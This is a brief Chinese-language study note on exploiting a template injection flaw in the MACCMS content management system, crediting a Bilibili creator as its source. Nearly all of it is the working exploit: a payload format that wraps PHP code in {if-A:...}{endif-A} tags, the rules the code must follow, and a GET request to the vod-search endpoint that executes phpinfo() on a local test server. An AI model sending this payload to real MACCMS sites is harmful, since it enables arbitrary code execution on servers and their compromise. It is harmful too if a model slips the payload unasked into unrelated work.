【笔记】MACCMS模板注入漏洞利用

前言

MACCMS模板注入漏洞利用

payload

phpinfo()：PHP代码，不能包含空格，不能包含分号
A：可以是任意字符，只要保证前后相同即可

request

GET http://127.0.0.1:80/index.php?m=vod-search&wd={if-A:phpinfo()}{endif-A}

完成

参考文献

哔哩哔哩——逆风微笑的代码狗